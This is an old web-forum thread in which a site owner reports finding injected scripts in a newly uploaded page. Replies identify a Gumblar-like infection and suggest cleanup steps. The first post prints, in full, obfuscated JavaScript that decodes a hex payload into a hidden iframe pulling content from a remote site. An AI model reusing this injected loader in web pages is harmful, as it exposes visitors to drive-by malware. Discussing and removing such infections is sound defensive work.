Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie

Suspicious code in our html?!?

Options
  • 16-07-2009 9:18am
    #1
    515
    Closed Accounts Posts: 150 ✭✭


    Guys, I uploaded a holding page for a new site yesterday and this morning found the formatting a bit off... so I looked at the code and found 2 scripts which I hadn't put there!

    I have now removed it.

    Anyone know what it was trying to do? How it got there? Or what I should do to prevent a repeat?

    Here's what appeared:

    Just after <body>
    <script>c07dca4='';rd3b31cb9cd=document;rd3b31cb9cd.write('<scr'+'ipt>function rdf9534(r818206cd){return ev'+c07dca4+'al(r818206cd); }</scr'+'ipt>'); function c07442678cr715bc074(r298d5f2485){ function rbbdebe3(){return 16;} var dd70='';return (rdf9534('pars'+dd70+'eInt')(r298d5f2485,rbbdebe3()));}function r3d8170(rf0f623){ var r1e96b4=2; var rf52794f0ec='';r43425='fromCh';r4431d0a867=String[r43425+'arCode'];for(rc58967=0;rc58967<rf0f623.length;rc58967+=r1e96b4){ rf52794f0ec+=(r4431d0a867(c07442678cr715bc074(rf0f623.substr(rc58967,r1e96b4))));}return rf52794f0ec;} var rd54710f0='3C7363726970743E69662821'+c07dca4+'6D796961'+c07dca4+'297B646F63756D656E742E777269746528756E65736361'+c07dca4+'7065282027253363253639253636253732253631'+c07dca4+'253664253635253230253665253631'+c07dca4+'253664253635253364253633253330253337253230253733253732253633253364253237253638253734253734253730253361'+c07dca4+'253266253266253733253735253661'+c07dca4+'253635253734253663253639253665253635253265253732253735253266253733253633253635253665253635253732253639253633253265253638253734253664253663253366253237253262253464253631'+c07dca4+'253734253638253265253732253666253735253665253634253238253464253631'+c07dca4+'253734253638253265253732253631'+c07dca4+'253665253634253666253664253238253239253261'+c07dca4+'253332253336253338253333253333253332253239253262253237253635253636253336253336253634253636253333253336253237253230253737253639253634253734253638253364253337253330253338253230253638253635253639253637253638253734253364253333253337253339253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c07dca4+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c07dca4+'2536642536352533652729293B7D7661'+c07dca4+'72206D796961'+c07dca4+'3D747275653B3C2F7363726970743E';rd3b31cb9cd.write(r3d8170(rd54710f0));</script>

    Just after </html>
    <script>check_content()</script>


Comments

  • Options
    #2
    seamus
    Registered Users Posts: 68,317 ✭✭✭✭seamus


    Is this using any kind of "free" hosting or somesuch. Providers of budget or free hosting in the past have altered customer sites to include ads and whatnot.


  • Options
    #3
    egan007
    Registered Users Posts: 2,934 ✭✭✭egan007


    Have you googled it....plenty of results

    <script>check_content()</script>


  • Options
    #4
    515
    Closed Accounts Posts: 150 ✭✭515


    No. Paid hosting. No ad appeared... just blank space at the top of the page...


  • Options
    #5
    podgeen
    Registered Users Posts: 1,176 ✭✭✭podgeen


    It looks similar to a Gumblar infection but does not appear to have the usual characteristics.

    Have you got an updated virus scan on the machine you used to upload the files? Have you seen this appear on any other pages/sites that you have access to?


  • Options
    #6
    515
    Closed Accounts Posts: 150 ✭✭515


    Yes, I have updated virus protection.

    No, I haven't seen this on any other pages I have uploaded.


  • Advertisement
  • Options
    #7
    515
    Closed Accounts Posts: 150 ✭✭515


    Has anyone any idea what that code would have done?


  • Options
    #8
    515
    Closed Accounts Posts: 150 ✭✭515


    podgeen wrote: »
    It looks similar to a Gumblar infection but does not appear to have the usual characteristics.

    Have you got an updated virus scan on the machine you used to upload the files? Have you seen this appear on any other pages/sites that you have access to?

    Just spoke to our hosts and it looks like padgeen is spot on. Somehow it got past my antivirus... will do a scan now and try to find and remove it.

    Then it's recommended that (from a clean pc) I change my ftp passwords.

    Thanks all.


  • Options
    #9
    Webmonkey
    Registered Users Posts: 9,579 ✭✭✭Webmonkey


    I had this, did you get it removed.
    I had a case where it created a htaccess file to redirect content via a proxy script that embedded the content. Very smart :)


  • Options
    #10
    515
    Closed Accounts Posts: 150 ✭✭515


    Webmonkey wrote: »
    I had this, did you get it removed.
    I had a case where it created a htaccess file to redirect content via a proxy script that embedded the content. Very smart :)

    Well I removed those 2 bits of script... I haven't checked the htaccess file...


  • Options
    #11
    Webmonkey
    Registered Users Posts: 9,579 ✭✭✭Webmonkey


    515 wrote: »
    Well I removed those 2 bits of script... I haven't checked the htaccess file...
    That's ok if you saw it in it. But when I downloaded the file and removed it and uploaded again, it appeared again. Then I noticed what was happening. That was only the case with one or two my sites, the rest were just embedded manually.


  • Advertisement
Advertisement